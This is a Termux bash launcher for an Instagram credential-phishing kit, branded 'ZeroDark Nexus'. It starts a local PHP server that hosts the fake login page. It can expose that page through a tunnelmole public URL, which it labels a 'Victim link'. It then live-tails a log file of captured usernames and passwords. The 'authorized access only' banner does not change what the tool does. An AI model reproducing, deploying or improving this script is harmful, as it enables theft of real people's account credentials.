#!/bin/bash
rm tunnelmole.txt

# ZeroDark Nexus Banner
clear
printf "\e[1;35m  [!]         WELCOME TO HACKER        [!]\e[0m\n\n"
printf "\e[1;32m==============================================\e[0m\n"
printf "\e[1;36m  [1] \e[1;32m System: Termux\e[1;37m => \e[1;33m Create by Mahadeb  \e[0m\n\n"
printf "\e[1;36m  [2]   \e[1;32m  Subscribe Now:\e[1;31mZeroDark Nexus        \e[0m\n\n"
printf "\e[1;36m  [3]    \e[1;33mWARNING: AUTHORIZED ACCESS ONLY!       \e[0m\n"
printf "\e[1;32m==============================================\e[0m\n"
printf "\e[1;31m        https://youtube.com/@zerodarknexus \e[0m\n"
printf "\e[1;32m==============================================\e[0m\n\n"
printf "\e[0m"

# Default Port
def_port='8080'

# File Path
file_path="/data/data/com.termux/files/usr/share/Instagram/User_data.txt"

# Install tunnelmole if not installed
if ! command -v tunnelmole >/dev/null 2>&1; then
    printf "\n \e[1;31m[!]\e[1;33m Installing Tunnelmole... \e[0m\n"
    npm install -g tunnelmole
fi

# Ask to delete log file
printf "\e[1;31m Do \e[31myou want to delete \e[0mthe log file? ( \e[1;31my\e[0m/\e[0mn)\e[1;31m:\e[0m"
read delete_choice

if [[ "$delete_choice" == "y" || "$delete_choice" == "Y" ]]; then
    if [ -f "$file_path" ]; then
        rm "$file_path"
        printf "\n \e[1;32m[✔] Log file deleted successfully!\e[0m\n"
    else
        printf "\n \e[1;33m[!] Log file does not exist! ⚠️ \e[0m\n"
    fi
fi

# Input Port
printf "\n \e[1;36m[🔌] Choose Port [default:${def_port}]:\e[0m"
read port
port="${port:-${def_port}}"

# Select localhost or tunnelmole
echo""
printf "  \e[1;32m[1]\e[0m (Localhost)\n"
printf "  \e[1;32m[2]\e[0m (Public URL)\n"
printf "\n \e[1;36m[🌐] Select server type:\e[0m"
read server_choice

# Start PHP server
cd /data/data/com.termux/files/usr/share/Instagram || {
    printf "\n \e[1;31m[✘] Directory not found! Exiting... ❌\n"
    exit 1
}

php -S 127.0.0.1:"$port" > /dev/null 2>&1 &

if [[ "$server_choice" == "1" ]]; then
    printf "\n \e[1;32m[✔] Localhost running: \e[1;33mhttp://127.0.0.1:$port \e[0m\n"
elif [[ "$server_choice" == "2" ]]; then
    printf "\n \e[1;32m[✔] Starting Server.. ⏳ \e[0m\n"
    tunnelmole "$port" | tee tunnelmole.txt &  
    sleep 5  
    clear 
    printf "\e[1;35m  [!]         WELCOME TO HACKER        [!]\e[0m\n\n"
    printf "\e[1;32m==============================================\e[0m\n"
    printf "\e[1;36m  [1] \e[1;32m System: Termux\e[1;37m => \e[1;33m Create by Mahadeb  \e[0m\n\n"
    printf "\e[1;36m  [2]   \e[1;32m  Subscribe Now:\e[1;31mZeroDark Nexus        \e[0m\n\n"
    printf "\e[1;36m  [3]    \e[1;33mWARNING: AUTHORIZED ACCESS ONLY!       \e[0m\n"
    printf "\e[1;32m==============================================\e[0m\n"
    printf "\e[1;31m    https://www.youtube.com/@zerodarknexus \e[0m\n"
    printf "\e[1;32m==============================================\e[0m\n\n"
    printf "\e[0m"
    tunnel_url=$(grep -oE 'https://[a-zA-Z0-9.-]+\.tunnelmole\.net' tunnelmole.txt | head -n 1)
    printf "\n \e[1;32m[✔] Victim link: \e[1;33m$tunnel_url \e[0m\n"
    if command -v termux-open-url >/dev/null 2>&1 && [ ! -z "$tunnel_url" ]; then
        termux-open-url "$tunnel_url"
    fi
else
    clear
    printf "\e[1;35m  [!]         WELCOME TO HACKER        [!]\e[0m\n\n"
    printf "\e[1;32m==============================================\e[0m\n"
    printf "\e[1;36m  [1] \e[1;32m System: Termux\e[1;37m => \e[1;33m Create by Mahadeb      \e[0m\n\n"
    printf "\e[1;36m  [2]   \e[1;32m  Subscribe Now:\e[1;31mZeroDark Nexus        \e[0m\n\n"
    printf "\e[1;36m  [3]    \e[1;33mWARNING: AUTHORIZED ACCESS ONLY!       \e[0m\n"
    printf "\e[1;32m==============================================\e[0m\n"
    printf "\e[1;31m    https://www.youtube.com/@zerodarknexus \e[0m\n"
    printf "\e[1;32m==============================================\e[0m\n\n"
    printf "\e[0m"
fi

# Show logs live
printf "\n \e[1;36m[📌] Press Ctrl + C to \e[31mexit. \e[0m\n"
printf "\n \e[1;35m[✔] Monitoring User & Password Log file... 📂 \e[0m\n"

if [ ! -f "$file_path" ]; then
    echo -e "........Live data will be displayed here........."
    touch "$file_path"
fi

tail -f "$file_path" | while read line; do
    echo -e "\e[1;32m$line\e[0m"
done
